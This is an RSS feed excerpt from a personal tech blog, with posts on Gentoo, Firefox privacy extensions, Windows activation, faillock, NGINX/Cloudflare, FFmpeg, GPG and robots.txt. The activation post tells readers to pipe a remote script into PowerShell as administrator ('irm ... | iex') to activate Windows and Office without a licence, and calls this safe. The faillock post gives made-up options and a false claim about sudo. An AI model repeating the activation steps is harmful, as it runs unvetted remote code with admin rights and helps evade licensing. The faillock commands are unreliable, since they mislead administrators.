However, one thing that stands out about this distribution is its perfection, especially for those well-versed in Linux. For the average user, though, it might not be the first choice. I&apos;d like to highlight that installing Gentoo is quite time-consuming. To put it in perspective, while you can have Arch Linux up and running in about 10 minutes, Gentoo will easily take you half a day to get everything set up. It&apos;s a labor of love for sure.

Finally I want to say:

```shell
btw i use Arch and Gentoo!
```

-- Arch &amp; Gentoo user

## References

- [Ultimate guide to installing Gentoo Linux for new users](https://onion.tube/watch?v=_50MJv4Dc40)
- [Gentoo AMD64 Handbook](https://wiki.gentoo.org/wiki/Handbook:AMD64)</content:encoded><author>UmmIt Kin &lt;root@ummit.dev&gt;</author></item><item><title>Firefox Plug-ins for Block annoying Malicious Code for any website</title><link>https://ummit.dev//posts/browser/extensions/web-extensions-protect/</link><guid isPermaLink="true">https://ummit.dev//posts/browser/extensions/web-extensions-protect/</guid><description>This guide introduces a selection of powerful browser extensions that can help you fortify your online traffic and surf the web with peace of mind.</description><pubDate>Fri, 15 Sep 2023 00:00:00 GMT</pubDate><content:encoded>## Introduction

This guide introduces a selection of powerful browser extensions that can help you fortify your online traffic and surf the web with peace of mind. These extensions are designed to enhance your browsing security, protect your online traffic, and shield you from unwanted tracking and ads.

### [uBlock Origin](https://addons.mozilla.org/en-US/firefox/addon/ublock-origin/)

uBlock Origin is a lightweight ad-blocker that efficiently blocks ads, pop-ups, and trackers, providing you with a cleaner and faster browsing experience. It also offers advanced features such as element blocking and custom blacklists and more.

See the source code on [GitHub](https://github.com/gorhill/uBlock).

![uBlock Origin](https://addons.mozilla.org/user-media/previews/thumbs/238/238548.jpg?modified=1622132423)

### [Privacy Badger](https://addons.mozilla.org/en-US/firefox/addon/privacy-badger17/)

Developed by the EFF, Privacy Badger is a robust privacy tool that blocks invisible trackers, providing you with a safer and more secure browsing experience. It automatically learns to block invisible trackers over time, safeguarding your online privacy.

See the source code on [GitHub](https://github.com/EFForg/privacybadger).

![Privacy Badger](https://addons.mozilla.org/user-media/previews/full/171/171793.png?modified=1622132342)

### [Decentraleyes](https://addons.mozilla.org/en-US/firefox/addon/decentraleyes/)

Decentraleyes is a privacy tool that protects you from tracking by loading CND resources locally, reducing the need for external requests and enhancing your browsing speed and privacy.

See the source code on [GitHub](https://git.synz.io/Synzvato/decentraleyes).

![Decentraleyes](https://addons.mozilla.org/user-media/previews/thumbs/137/137406.jpg?modified=1622132453)

### [DuckDuckGo Privacy Essentials](https://addons.mozilla.org/en-US/firefox/addon/duckduckgo-for-firefox/)

DuckDuckGo Privacy Essentials is a comprehensive privacy tool that blocks trackers, enforces encryption, and provides a privacy grade for each website you visit.

See the source code on [GitHub](https://github.com/duckduckgo/duckduckgo-privacy-extension).

![DuckDuckGo Privacy Essentials](https://addons.mozilla.org/user-media/previews/full/307/307998.png?modified=1730489460)

### [NoScript](https://addons.mozilla.org/en-US/firefox/addon/noscript/)

NoScript is a powerful security tool that blocks JavaScript, Java, Flash, and other potentially harmful content, protecting you from malicious scripts and attacks. such as cross-site scripting (XSS) and clickjacking.

See the source code on [GitHub](https://github.com/hackademix/noscript).

![NoScript](https://addons.mozilla.org/user-media/previews/full/267/267408.png?modified=1668722455)

### [ClearURLs](https://addons.mozilla.org/en-US/firefox/addon/clearurls/)

ClearURLs is designed to strip tracking elements from URLs, safeguarding your privacy by preventing unnecessary tracking.

See the source code on [GitHub](https://github.com/ClearURLs/Addon).

![ClearURLs](https://addons.mozilla.org/user-media/previews/thumbs/231/231733.jpg?modified=1640781132)

### [Cookie AutoDelete](https://addons.mozilla.org/en-US/firefox/addon/cookie-autodelete/)

Cookie AutoDelete is a privacy tool that automatically deletes cookies from closed tabs. Cookies should not stay around forever, and this extension helps you manage them effectively. Don&apos;t let cookies track you across the web.

See the source code on [GitHub](https://github.com/Cookie-AutoDelete/Cookie-AutoDelete).

![Cookie AutoDelete](https://addons.mozilla.org/user-media/previews/full/189/189656.png?modified=1622132671)

### [Facebook Container](https://addons.mozilla.org/en-US/firefox/addon/facebook-container/)

Facebook Container isolates your online activity from Facebook, preventing the social media giant from tracking your web browsing behavior.

See the source code on [GitHub](https://github.com/mozilla/contain-facebook).

![Facebook Container](https://addons.mozilla.org/user-media/previews/full/235/235581.png?modified=1622133081)

### [Popup Blocker](https://addons.mozilla.org/en-US/firefox/addon/popup-blocker/)

Popup Blocker is a simple yet effective tool that blocks annoying pop-ups, well-known website using pop-ups to show ads is porn sites, this extension will help you block them :)

See the source code on [GitHub](https://github.com/schomery/popup-blocker).

![Popup Blocker](https://addons.mozilla.org/user-media/previews/thumbs/179/179585.jpg?modified=1622132611)

## Conclusion

These browser can be definitely block those tracker and ads that want to track you and show you ads. It can help you to protect while browsing the web.</content:encoded><author>UmmIt Kin &lt;root@ummit.dev&gt;</author></item><item><title>MAS: A Safe way to Active your windows and office without 3rd-party unknown software</title><link>https://ummit.dev//posts/windows/microsoft-activation-scripts/</link><guid isPermaLink="true">https://ummit.dev//posts/windows/microsoft-activation-scripts/</guid><description>Using unknown software to activate your windows or office may cause your computer to become infected. In this article, we will introduce a tool called Microsoft Activation Scripts.</description><pubDate>Sun, 10 Sep 2023 00:00:00 GMT</pubDate><content:encoded>## Introduction

Do you feel idiotic that you have to spend more than a hundred dollars to buy Windows, and you don&apos;t understand why you have to watch the built-in advertisements of Windows after you buy it? This article will teach you how to use the [Microsoft Activation Scripts (MAS)](https://github.com/massgravel/Microsoft-Activation-Scripts) tool to enable Windows without installing any third-party unknown software.

In addition, [Microsoft Activation Scripts (MAS)](https://github.com/massgravel/Microsoft-Activation-Scripts) can activate Office and all Windows versions.

## Getting Started: Active Windows Step

1. Open a PowerShell with administrator

2. Type the following command to execute a script from the URL:

```powershell
irm https://massgrave.dev/get | iex
```

3. You will see the option menu on your terminal screen, type `2` for KMS38 / Windows, that will active your windows until

![](https://massgrave.dev/MAS_AIO.png)

4. Wait for the active to finish, it will show Press any key to Go back.

5. That&apos;s all, You windows has been Successfully activated!

## How about Office?

Do you want to use Office 365 too? But one problem is that you need to download the files to activate it,  don&apos;t worry! [MAS](https://massgrave.dev/) has integrated all the files in the official website, [click here](https://massgrave.dev/genuine-installation-media.html)!

1. Download Office file:
Click the link to download the mirror you want, download office and open the MAS script again

2. Again, Open a PowerShell with administrator

3. Type the following command to execute a script from the URL:

```powershell
irm https://massgrave.dev/get | iex
```

4. You will see the options menu on the terminal screen, enter &quot;3&quot; for Office/Windows and select Office. Then, wait a moment and your Office 180 days will be activated.

&gt;Notes: After 180 days you will need to do active again.

![](https://massgrave.dev/MAS_AIO.png)

5. That&apos;s all, You Office has been Successfully activated!

## Conclusion

With MAS, A tool fully open-source and safe, you no longer have to worry about buying a windows key or having to pay an annual fee to activate your office.</content:encoded><author>UmmIt Kin &lt;root@ummit.dev&gt;</author></item><item><title>Unlocking a Linux User After Too Many Failed Login Attempts</title><link>https://ummit.dev//posts/linux/built-in-tools/faillock/</link><guid isPermaLink="true">https://ummit.dev//posts/linux/built-in-tools/faillock/</guid><description>Discover how to regain access to a locked Linux user account by using the faillock command to reset failed login attempts. Explore the steps to effectively manage account lockouts for enhanced security and system maintenance.</description><pubDate>Sun, 10 Sep 2023 00:00:00 GMT</pubDate><content:encoded>## Introduction

Linux systems are robust security,One such mechanism is designed to protect against unauthorized access by temporarily locking out a user after too many failed login attempts. While this feature enhances security, there may be situations where you need to manually unlock a user account. In this guide, we&apos;ll explore how to unlock a Linux user account using the `faillock` command.

## Why Would You Need to Unlock a User Account?

Before we delve into the process, let&apos;s understand why you might need to unlock a user account:

1. **Accidental Lockout**: Users can sometimes forget their passwords or make multiple login attempts with incorrect credentials, resulting in a lockout.

2. **Maintenance**: During system maintenance or troubleshooting, you might need to unlock an account to regain access.

3. **Security Measures**: While account lockouts are security features, there could be cases where you want to manually control account access, such as when you believe an account is locked unjustly or prematurely.

## Using `faillock` to Unlock a User Account

The `faillock` command is a useful tool for managing user account lockouts. It provides a straightforward way to view and reset failed login attempts and unlock user accounts. Here&apos;s how to use it:

### 1. Check the Current Status

Before proceeding, it&apos;s a good idea to check the current status of the user account you want to unlock. Use the following command, replacing `username` with the actual username:

```bash
faillock --user username
```

This command will display the current status, including the number of failed attempts and whether the account is locked.

### 2. Unlock the User Account

To unlock a user account, you can use the `faillock` command with the `--reset` option. Again, replace `username` with the actual username:

```bash
faillock --user username --reset
```

This command will reset the failed login attempts for the specified user and unlock the account if it was locked.

### 3. Verify the Status

After resetting the account, you can recheck its status to ensure that it&apos;s no longer locked:

```bash
faillock --user username
```

The output should indicate that the user&apos;s account is no longer locked and that there have been no recent failed login attempts.

## ALL User Options

The `faillock` command offers various options for managing user accounts and failed login attempts. Here are some actions you can perform:

- **Display All User Accounts:** To see the status of all user accounts with failed login attempts, use the command without specifying a username:

  ```bash
  faillock
  ```

- **Unlock All Accounts:** To unlock all locked user accounts, use the following command:

  ```bash
  faillock --reset
  ```

- **Set Lockout Threshold:** You can configure the maximum number of allowed failed login attempts before an account is locked using the `--unlock-time` and `--lock-time` options.

## Optional Lockout Threshold Configuration

For added security, you can configure the lockout threshold, which determines the maximum number of allowed failed login attempts before an account is locked. Use the faillock command with the --unlock-time and --lock-time options to fine-tune these settings.

- `--unlock-time`: Specifies the duration for which the account remains locked after reaching the maximum failed login attempts.
- `--lock-time`: Sets the duration for which the account is locked after a failed login attempt.

For example, to set a 30-minute lockout period after three failed login attempts, you can use the following command:

```bash
faillock --user &lt;username&gt; --reset --unlock-time 1800 --lock-time 1800
```

This configuration ensures that the user account is locked for 30 minutes after three consecutive failed login attempts.

### Nice Example

To lock the user account for 10 minutes after 10 consecutive failed login attempts, you can use the `faillock` command as follows:

```bash
faillock --user &lt;username&gt; --reset --unlock-time 600 --lock-time 600 --maximum-attempts 10
```

In this command:

- `--user &lt;username&gt;` specifies the username for which you want to make this change.
- `--reset` resets the failed login attempts counter.
- `--unlock-time 600` and `--lock-time 600` set the lockout duration to 600 seconds (10 minutes).
- `--maximum-attempts 10` configures the maximum allowed failed login attempts to 10.

This configuration will lock the user account for 10 minutes if there are 10 consecutive failed login attempts.

## Conclusion

Linux provides robust security features to protect user accounts, including the ability to lock accounts temporarily after too many failed login attempts. By understanding how to use the `faillock` command, you can easily reset failed login attempts and unlock a Linux user account without requiring sudo privileges. This knowledge empowers you to maintain the security of your Linux system effectively.

## Reference

- [How to unlock linux user after too many failed login attempts](https://superuser.com/questions/1597162/how-to-unlock-linux-user-after-too-many-failed-login-attempts)</content:encoded><author>UmmIt Kin &lt;root@ummit.dev&gt;</author></item><item><title>Host a Website and Configure SSL with Self-Signed TLS, Cloudflare and NGINX</title><link>https://ummit.dev//posts/linux/tools/nginx/</link><guid isPermaLink="true">https://ummit.dev//posts/linux/tools/nginx/</guid><description>Learn how to set up NGINX on a Linux VPS, host a website, and secure it with SSL using a self-signed TLS certificate through Cloudflare. Follow our step-by-step guide to ensure your website is up and running securely.</description><pubDate>Sun, 10 Sep 2023 00:00:00 GMT</pubDate><content:encoded>## Introduction

In the world of web servers, NGINX stands out as a powerful and efficient choice for hosting websites and web applications. Whether you&apos;re running a personal blog, a small business website, or a complex web application, NGINX is a versatile tool that can handle the job with ease. In this blog post, we&apos;ll walk you through the process of setting up NGINX on a Linux VPS, hosting a website, and securing it with SSL using a self-signed TLS certificate through Cloudflare.

## Step 1: Provision a Linux VPS

Before you can set up NGINX, you&apos;ll need a virtual private server (VPS) running a Linux distribution of your choice. Popular options include Ubuntu, CentOS, and Debian. You can choose a VPS provider like DigitalOcean, Linode, or AWS to provision your server.

## Step 2: Connect to Your VPS

Once your VPS is up and running, you&apos;ll need to connect to it using SSH. Open your terminal and use the following command to connect to your VPS:

```bash
ssh username@your_server_ip
```

Replace `username` with your server&apos;s username and `your_server_ip` with the actual IP address of your VPS.

## Step 3: Update Your System

It&apos;s essential to keep your server&apos;s software up to date for security and stability. Run the following commands to update your server:

```bash
sudo apt update
sudo apt upgrade
```

Replace `apt` with `yum` if you&apos;re using CentOS.

## Step 4: Install NGINX

Installing NGINX on Linux is straightforward. Use the package manager for your distribution to install NGINX. For Ubuntu, you can run:

```bash
sudo apt install nginx
```

For CentOS:

```bash
sudo yum install nginx
```

## Step 5: Start NGINX and Enable Auto-Start on Boot

After installation, start NGINX and enable it to start automatically on boot:

```bash
sudo systemctl start nginx
sudo systemctl enable nginx
```

### Allow Nginx Full in Firewall

Now, need to allow traffic on the Nginx Full port. Run the following command to allow incoming traffic on port 443:

```bash
sudo ufw allow &apos;Nginx Full&apos;
```

and reload the ufw firewall:

```bash
sudo ufw reload
```

This step ensures that your NGINX server can receive traffic.

## Adding SSL/TLS Encryption with Cloudflare

Now that you&apos;ve set up NGINX to serve your website, it&apos;s time to enhance security by encrypting the connection between your server and visitors&apos; browsers using SSL/TLS. Cloudflare offers a convenient way to manage SSL/TLS certificates and provides additional security features like DDoS protection and web application firewall (WAF). Follow these steps to integrate Cloudflare with your NGINX server:

### Step 6: Sign Up for Cloudflare and Add Your Website

If you haven&apos;t already, sign up for a Cloudflare account and add your website to the dashboard. Cloudflare will guide you through the process of updating your domain&apos;s DNS settings to point to their servers.

### Step 7: Select SSL/TLS Encryption Mode

Navigate to the SSL/TLS section in your Cloudflare dashboard and select the &quot;Overview&quot; tab. Choose the encryption mode that best suits your needs. For maximum security, we recommend selecting &quot;Full (strict)&quot; mode, which ensures end-to-end encryption between Cloudflare and your origin server.

### Step 8: Generate an Origin Certificate

Cloudflare provides free SSL/TLS certificates, known as Origin Certificates, for securing the connection between Cloudflare and your origin server. Follow these steps to generate an Origin Certificate:

1. Log in to your Cloudflare dashboard.
2. Go to the SSL/TLS section and click on &quot;Origin Certificates.&quot;
3. Select the appropriate options, such as the private key type (RSA 2048), hostnames, and certificate validity period.
4. Click &quot;Create Certificate&quot; to generate the certificate.

### Step 9: Install Origin Certificate on Your Server

Once you&apos;ve generated the Origin Certificate, you need to install it on your NGINX server. SSH into your server and follow these steps:

1. Create the Origin Certificate file:

```bash
sudo vim /etc/ssl/cert.pem
```

2. Paste the Origin Certificate key into the file and save it.

3. Create the Private Key file:

```bash
sudo vim /etc/ssl/key.pem
```

4. Paste your Private Key into the file and save it.

### Step 10: Update NGINX Configuration

Update your NGINX configuration file to use the installed SSL/TLS certificates. Open/Create the configuration file:

```bash
sudo vim /etc/nginx/conf.d/yoursite_me.conf
```

Replace the SSL certificate and key paths with the paths to your Origin Certificate and Private Key files, and ensure the `server_name` matches your directory structure:

```conf
server {
  listen 443 ssl http2;
  listen [::]:443 ssl http2;

  ssl_certificate       /etc/ssl/cert.pem;
  ssl_certificate_key   /etc/ssl/key.pem;

  location / {
          try_files $uri $uri/ =404;
  }

  server_name yoursite_me yoursize.me;

  root /var/www/yoursite_me/html;
  index index.html;
}
```

### Step 11: Test and Restart NGINX

Before proceeding, test your NGINX configuration to ensure there are no syntax errors:

```bash
sudo nginx -t
```

If the test is successful, restart NGINX to apply the changes:

```bash
sudo systemctl restart nginx
```

### Step 12: Verify Cloudflare Settings

Finally, return to your Cloudflare dashboard and verify that SSL/TLS encryption mode is set to &quot;Full (strict)&quot; to enforce secure communication between Cloudflare and your NGINX server.

With these steps completed, your website is now securely encrypted with SSL/TLS, providing enhanced security and privacy for your visitors.

## References

- [How To Host a Website Using Cloudflare and Nginx on Ubuntu 22.04](https://www.digitalocean.com/community/tutorials/how-to-host-a-website-using-cloudflare-and-nginx-on-ubuntu-22-04)
- [How To Install Nginx on Ubuntu 22.04](https://www.digitalocean.com/community/tutorials/how-to-install-nginx-on-ubuntu-22-04#step-5-setting-up-server-blocks-recommended)</content:encoded><author>UmmIt Kin &lt;root@ummit.dev&gt;</author></item><item><title>A Comprehensive Guide for FFmpeg</title><link>https://ummit.dev//posts/linux/tools/ffmpeg/ffmpeg-commands/</link><guid isPermaLink="true">https://ummit.dev//posts/linux/tools/ffmpeg/ffmpeg-commands/</guid><description>Explore essential commands and techniques for FFmpeg</description><pubDate>Sun, 10 Sep 2023 00:00:00 GMT</pubDate><content:encoded>## Introduction

In the world of multimedia processing, FFmpeg stands as a versatile and powerful tool that enables you to manipulate audio and video files in countless ways. Whether you&apos;re a professional video editor, a streaming enthusiast, or just someone who wants to tinker with multimedia files, FFmpeg is your go-to solution. In this blog post, we will delve into the fundamentals of FFmpeg and explore some common commands to get you started on your multimedia journey.

### What is FFmpeg?

FFmpeg is an open-source software suite that provides a collection of multimedia libraries and tools to work with audio and video files. It allows you to convert, edit, stream, and record audio and video content from various sources. FFmpeg is used by both professionals and hobbyists alike for a wide range of multimedia tasks.

## Installation

Before you can start using FFmpeg, you need to install it on your system. Installation methods vary depending on your operating system. For Linux, you can use your package manager:

```bash
sudo apt install ffmpeg  # On Debian/Ubuntu
sudo pacman -S ffmpeg  # On arch
```

## Basic FFmpeg Commands

Here are some common command which is for your daily used.

### 1. **Merging Video and Audio**

**Scenario 1:** Copy Video and Encode Audio to AAC Format

```bash
ffmpeg -i video.mp4 -i audio.wav -c:v copy -c:a aac output.mp4
```

- `-i video.mp4` specifies the input video file.
- `-i audio.wav` specifies the input audio file.
- `-c:v copy` copies the video codec without re-encoding.
- `-c:a aac` encodes the audio using the AAC codec.
- `output.mp4` is the output file with merged video and audio.

**Scenario 2:** Copy Both Video and Audio Streams into MKV Container

```bash
ffmpeg -i video.mp4 -i audio.wav -c copy output.mkv
```

- `-c copy` copies both video and audio streams without re-encoding.
- `output.mkv` is the output file with merged video and audio.

**Scenario 3:** Copy Video and Encode Audio with Explicit Input Streams

```bash
ffmpeg -i video.mp4 -i audio.wav -c:v copy -c:a aac -map 0:v:0 -map 1:a:0 output.mp4
```

- `-map 0:v:0` selects the video stream from the first input (`0:v:0`).
- `-map 1:a:0` selects the audio stream from the second input (`1:a:0`).

### 2. **Converting HLS to MP4**

HLS (HTTP Live Streaming) is a common streaming format. If you have an HLS stream and want to convert it to the MP4 format, use the following command:

```bash
ffmpeg -i file.m3u8 -c copy file.mp4
```

- `-i file.m3u8` specifies the input HLS stream.
- `-c copy` copies the streams without re-encoding.
- `file.mp4` is the output MP4 file.

### 3. **Creating a Video with a Cover Image**

If you want to create a video from an image and an audio file, overlaying the image on the audio track, use this command:

```bash
ffmpeg.exe -i &quot;IPX-404.mp4&quot; -i &quot;IPX-404.jpg&quot; -map 1 -map 0 -acodec copy -vcodec copy &quot;cover_IPX_404.mp4&quot;
```

- `-i &quot;IPX-404.mp4&quot;` specifies the input video.
- `-i &quot;IPX-404.jpg&quot;` specifies the input image.
- `-map 1` selects the second input (image) as the video source.
- `-map 0` selects the first input (video) as the audio source.
- `-acodec copy` copies the audio codec without re-encoding.
- `-vcodec copy` copies the video codec without re-encoding.
- `&quot;cover_IPX_404.mp4&quot;` is the output video file.

### 4. **Extracting Frames from a Video**

To extract frames from a video at a specific timestamp, you can use the following commands:

**Scenario 1:** Extract a Single Frame at 10 Seconds into the Video

```bash
ffmpeg -i inputvideo.mp4 -ss 00:00:10 -frames:v 1 screenshot.jpg
```

- `-ss 00:00:10` specifies the timestamp (10 seconds).
- `-frames:v 1` indicates that you want to extract one frame.
- `screenshot.jpg` is the output image file.

**Scenario 2:** Extract Multiple Frames

```bash
ffmpeg -i inputvideo.mp4 -ss 00:00:10 -frames:v 50 screenshots_%03d.jpg
```

- `-ss 00:00:10` specifies the starting timestamp (10 seconds).
- `-frames:v 50` indicates that you want to extract 50 frames.
- `screenshots_%03d.jpg` generates multiple output image files with sequential numbering (e.g., `screenshots_001.jpg`, `screenshots_002.jpg`, ...).

## Conclusion

With Ffmpeg its extensive capabilities, you can manipulate audio and video files in various ways, from simple tasks like merging audio and video to more complex operations like video conversion and frame extraction.</content:encoded><author>UmmIt Kin &lt;root@ummit.dev&gt;</author></item><item><title>GPG Keys: Managing, Importing, and Verifying</title><link>https://ummit.dev//posts/linux/tools/gpg/gpg-manage-import-verify/</link><guid isPermaLink="true">https://ummit.dev//posts/linux/tools/gpg/gpg-manage-import-verify/</guid><description>Mastering GPG keys for secure communication and data integrity - Learn how to manage, import, delete, list, and verify GPG keys in this comprehensive guide.</description><pubDate>Wed, 06 Sep 2023 00:00:00 GMT</pubDate><content:encoded>## What is GPG?

**GPG**, or **GNU Privacy Guard**, is a powerful open-source encryption software that provides cryptographic privacy and authentication for data communication. GPG keys play a central role in GPG&apos;s functionality, enabling secure communication and verification of data integrity. In this guide, we&apos;ll explore GPG keys and how to manage, import, delete, list, and verify them.

## What Are GPG Keys?

At its core, GPG uses a pair of keys to secure your data: the **public key** and the **private key**. These keys are mathematically related but serve different purposes:

- **Public Key**: This key is used to encrypt data and verify digital signatures. It can be shared openly with others.
- **Private Key**: This key is used to decrypt data and create digital signatures. It must be kept secret and should never be shared.

## Importing GPG Keys

Importing GPG keys is essential for establishing trust with other users and organizations. It allows you to verify data they&apos;ve signed and encrypt data specifically for them. To import a GPG key, you can use the `gpg --import` command:

```shell
gpg --import mykey.asc
```

This command imports a GPG key from the `mykey.asc` file into your keyring.

## Listing GPG Keys

Managing keys efficiently involves keeping track of them. To list your GPG keys, use the `gpg --list-keys` and `gpg --list-secret-keys` commands:

```shell
gpg --list-keys
```

This command displays a list of your public keys:

```plaintext
pub   rsa2048/0xDEADBEEF 2018-01-01
uid                  John Doe &lt;john@example.com&gt;
sub   rsa2048/0xC0FFEE01 2018-01-01
```

The output shows the key ID, key type (RSA), creation date, user ID, and any subkeys.

```shell
gpg --list-secret-keys
```

This command lists your secret (private) keys.

## Deleting GPG Keys

If you need to remove a GPG key from your keyring, use the `gpg --delete-key` command followed by the key&apos;s ID:

```shell
gpg --delete-key DEADBEEF
```

Replace `DEADBEEF` with the actual key ID.

## Verifying Signatures with GPG

GPG allows you to verify the authenticity and integrity of files and messages by checking their digital signatures. To verify a signature, use the `gpg --verify` command:

```shell
gpg --verify file.tar.gz.sig
```

This command verifies the signature on the `file.tar.gz` archive using the associated `.sig` file.

## Receiving Keys from a Key Server

When you need someone&apos;s public key for secure communication, you can retrieve it from a key server using `gpg --recv-key`:

```shell
gpg --recv-key DEADBEEF
```

Replace `DEADBEEF` with the key ID of the key you want to retrieve. GPG will fetch the key from a key server and add it to your keyring.

## Conclusion

GPG keys are the foundation for secure communication and data authentication. In this lesson, you will learn how to manage, import, list, delete, and validate.</content:encoded><author>UmmIt Kin &lt;root@ummit.dev&gt;</author></item><item><title>A Guide to custom robots.txt with Disallow or allow Rule</title><link>https://ummit.dev//posts/web/search-engine/how-to-block-search-engine-with-robotstxt-and-custom/</link><guid isPermaLink="true">https://ummit.dev//posts/web/search-engine/how-to-block-search-engine-with-robotstxt-and-custom/</guid><description>Learn how to take control of search engine crawling by using the robots.txt disallow rule to restrict access to specific parts of your website.</description><pubDate>Mon, 04 Sep 2023 00:00:00 GMT</pubDate><content:encoded>## Introduction

In the vast landscape of the internet, search engines are the navigators, helping users discover websites and content. However, not every website owner wants search engines to freely roam their digital domain. This is where the robots.txt file, with its &quot;Allow&quot; and &quot;Disallow&quot; directives, comes into play, offering webmasters a powerful tool for controlling how search engine crawlers interact with their sites.

In this comprehensive guide, we will delve into the world of controlling search engine crawlers using the robots.txt file&apos;s &quot;Allow&quot; and &quot;Disallow&quot; directives. You&apos;ll learn what it is, why it&apos;s essential, and how to implement it effectively to regulate search engine access to your web content.

## What is Robots.txt?

At its core, the robots.txt file is a simple but powerful tool that website owners use to communicate with web crawlers, also known as spiders or bots. These automated programs, employed by search engines like Google, Bing, and others, traverse the web, indexing web pages to make them searchable.

The robots.txt file serves as a set of instructions for these crawlers. It tells them which parts of a website are open for exploration and indexing (using &quot;Allow&quot;) and which should remain off-limits (using &quot;Disallow&quot;). In essence, it acts as both a &quot;Welcome&quot; and a &quot;No Entry&quot; sign for certain areas of your website.

To create and manage a robots.txt file, you don&apos;t need to be a coding wizard. It&apos;s a plain text file that sits at the root directory of your website, and you can create or edit it with a simple text editor.

### Why Is This Control Necessary?

By default, even if you haven&apos;t explicitly added your site to a search engine, web crawlers can autonomously find and index your public domain. This can lead to undesired visibility or indexing of confidential information.

### Why You Might Want to Use &quot;Disallow&quot;

The internet is a vast, interconnected ecosystem where privacy, security, and content control matter. Here are some compelling reasons why you might want to use the &quot;Disallow&quot; directive to block search engines from crawling specific parts of your website:

- **Private or Restricted Content**: You have sections of your site that are intended for specific users only, and you want to keep them hidden from search engine indexing.

- **Staging or Development Sites**: You may have staging or development versions of your site that you don&apos;t want appearing in search results.

## Implementing &quot;Allow&quot; and &quot;Disallow&quot; in Robots.txt

Now that we understand why you might want to use &quot;Disallow&quot; to block a search engine, let&apos;s explore how to use both &quot;Allow&quot; and &quot;Disallow&quot; effectively in your robots.txt file:

1. **Locate Your Robots.txt File**: Find the robots.txt file at the root directory of your website. For example, it&apos;s accessible at `https://yourwebsite.com/robots.txt`.

2. **Choose User Agents**: Decide which search engine bots you want to allow or block. The User-agent directive specifies the bot you&apos;re addressing.

3. **Set &quot;Disallow&quot; Rules**: Use the &quot;Disallow&quot; directive to specify the URLs or directories you want to block for the chosen user agent.

4. **Set &quot;Allow&quot; Rules**: Use the &quot;Allow&quot; directive to specify exceptions to the &quot;Disallow&quot; rules, allowing certain parts of your site to be crawled by search engines.

### Example: Allowing and Disallowing with Robots.txt

You can further refine your control over search engine access by using both &quot;Allow&quot; and &quot;Disallow&quot; directives. Here&apos;s an example:

```plain
User-agent: Googlebot
Disallow: /private/
Allow: /public/
```

- `User-agent: Googlebot` specifies that these rules apply specifically to Google&apos;s search engine bot.

- `Disallow: /private/` tells Googlebot not to access the &quot;/private/&quot; directory.

- `Allow: /public/` provides an exception, allowing Googlebot to access the &quot;/public/&quot; directory, even though it falls under the broader &quot;Disallow&quot; rule.

By combining &quot;Allow&quot; and &quot;Disallow&quot; directives, you can fine-tune access control for different search engines or specific parts of your site.

### Example: Blocking Everything with Robots.txt

In some cases, you might want to prevent all search engines from crawling and indexing your entire website. This is a drastic step, but it can be useful for specific scenarios, such as when you&apos;re working on a development version of your site and don&apos;t want it to appear in search results. Here&apos;s how you can achieve this by blocking everything using robots.txt:

```plain
User-agent: *
Disallow: /
```

In this example:

- `User-agent: *` specifies that these rules apply to all web crawlers.

- `Disallow: /` is the directive that tells all web crawlers to stay away from your entire site. The forward slash &quot;/&quot; represents the root directory, so &quot;Disallow: /&quot; effectively blocks access to the entire website.

Please use this directive with caution, as it will make your entire site inaccessible to search engines. Only use it temporarily and in situations where you have a specific need to keep your site out of search engine results. Be sure to remove or modify this rule when you want your site to be indexed again.

### Example: Specifying Rules for Googlebot

If you want to specify rules for Googlebot specifically, you can use the following example:

```plain
User-agent: Googlebot
Disallow: /private/
```

- `User-agent: Googlebot` specifies that these rules apply only to Google&apos;s search engine bot.

- `Disallow: /private/` tells Googlebot not to access the &quot;/private/&quot; directory.

You can customize these rules to control how Googlebot interacts with your website.

### Example: Specifying Rules for Bingbot

To specify rules for Bingbot, Microsoft&apos;s search engine bot, you can use a similar approach:

```plain
User-agent: Bingbot
Disallow: /restricted/
Allow: /public/
```

- `User-agent: Bingbot` specifies that these rules apply specifically to Bingbot.

- `Disallow: /restricted/` instructs Bingbot not to access the &quot;/restricted/&quot; directory.

- `Allow: /public/` provides an exception, allowing Bingbot to access the &quot;/public/&quot; directory, even though it falls under the broader &quot;Disallow&quot; rule.

## Using `noindex, nofollow` to Disallow Crawling

While the `robots.txt` file is effective for controlling search engine access to entire directories or sections of your website, you might want to exert more granular control over individual web pages. To achieve this level of control, you can use the `noindex, nofollow` meta tag within the HTML of specific pages.

Here&apos;s how to use the `noindex, nofollow` meta tag:

1. **Locate the HTML `&lt;head&gt;` Section**: Open the HTML file of the page you want to block search engines from indexing and locate the `&lt;head&gt;` section within the HTML document.

2. **Insert the Meta Tag**: Inside the `&lt;head&gt;` section, add the following meta tag:

   ```html
   &lt;meta name=&quot;robots&quot; content=&quot;noindex, nofollow&quot; /&gt;
   ```

   This meta tag instructs search engine crawlers not to index the page (`noindex`) and not to follow any links on the page (`nofollow`), effectively preventing the page from appearing in search engine results and preventing search engines from crawling any links present on the page.

3. **Save and Update**: Save the changes to your HTML file and upload it to your web server if necessary.

4. **Verify the Meta Tag**: To ensure that the `noindex, nofollow` meta tag has been correctly implemented, you can inspect the HTML source code of the page after it&apos;s live on your server. Right-click on the page in your web browser and select &quot;View Page Source&quot; or use the browser&apos;s developer tools to inspect the page&apos;s HTML source. Look for the presence of the meta tag within the `&lt;head&gt;` section.

Using the `noindex, nofollow` meta tag is particularly useful when you want to block individual pages from being indexed while allowing the rest of your website to be accessible to search engine crawlers. It&apos;s a versatile tool for fine-tuning your website&apos;s visibility and ensuring that specific content remains private or hidden from search engine results.

Remember that while the `robots.txt` file blocks access to pages and directories at the crawling stage, the `noindex, nofollow` meta tag affects how search engines display and follow links on already indexed pages. Both methods work together to provide comprehensive control over your website&apos;s visibility on search engines.

## Verifying Your Robots.txt Configuration

After you&apos;ve created or modified your robots.txt file, it&apos;s crucial to verify its configuration to ensure it&apos;s working as intended. Here&apos;s how you can do it:

1. **Upload the Robots.txt File**: First, upload the robots.txt file to the root directory of your web server. You can access it by visiting `https://yourdomain.com/robots.txt`.

2. **Check the Content**: When you access this URL, you should see the content of your robots.txt file displayed in your web browser. This confirms that the file has been correctly uploaded and is accessible to both humans and web crawlers.

### Waiting for Search Engine Bot Action

Once your robots.txt file is uploaded and accessible, you&apos;ll need to be patient as search engine bots process the changes. Here&apos;s what to expect:

1. **Monitoring and Waiting**: After you&apos;ve uploaded the robots.txt file, you&apos;ll need to be patient. It may take a few days or more for search engine bots to discover and process your updated robots.txt file. During this period, the bots will continue to crawl your site based on their previous instructions.

2. **Updates to Search Results**: Once the search engine bots have processed the new robots.txt file, they will update their indexing accordingly. This means that any URLs or directories you&apos;ve disallowed in the robots.txt file will eventually be removed from search engine results, and any new instructions will be implemented.

